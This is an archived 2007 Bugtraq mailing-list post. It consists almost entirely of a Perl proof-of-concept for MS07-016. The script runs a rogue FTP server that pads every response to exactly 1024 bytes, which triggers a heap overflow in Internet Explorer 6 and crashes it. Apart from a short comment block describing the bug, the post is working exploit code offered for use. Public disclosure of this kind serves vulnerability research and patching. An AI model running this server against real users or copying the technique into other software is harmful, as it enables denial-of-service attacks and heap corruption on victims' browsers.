lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070309025534.1a91f3ef@singlet>
Date: Fri, 9 Mar 2007 02:55:34 -0700
From: Mathew Rowley <mathew.rowley@...il.com>
To: bugtraq@...urityfocus.com, vuln-dev@...urityfocus.com
Subject: MS07-016 FTP Response DOS PoC

Anything more to say?


#!/usr/bin/perl

# MS 07-016 FTP Server Response PoC
# Usage: ./ms07016ftp.pl [LISTEN_IP]
#
# Tested Against: MSIE 6.02900.2180 (SP2)
#
# Details: The response is broken into buffers, either at length 1024,
# 		   or at '\r\n'. Each buffer is apended with \x00, without
# 		   bounds checking.  If the response is exctly 1024 characters
# 		   in length, you will overflow the heap with the string \x00.


use IO::Socket;
use strict;

# Create listener
my $ip=shift || '127.0.0.1';
my $sock = IO::Socket::INET->new(Listen=>1, 
	                          LocalHost=>$ip, 
						      LocalPort=>'21', 
							      Proto=>'tcp');
$sock or die ("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");

# Wait for initial connection and send banner
my $sock_in = $sock->accept();
print $sock_in "220 waa waa wee waa\r\n";

# Send response code with total lenght of response = 1024
while (<$sock_in>){
	my $response;
	if($_ eq "USER") { $response="331 ";}
	elsif($_ eq "PASS") { $response="230 ";}
	elsif($_ eq "syst") { $response="215 ";}
	elsif($_ eq "CWD") { $response="250 ";}
	elsif($_ eq "PWD") { $response="230 ";}
	else { $response="200 ";}
	print $sock_in $response."A"x(1024-length($response)-2)."\r\n";
}
close($sock);

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ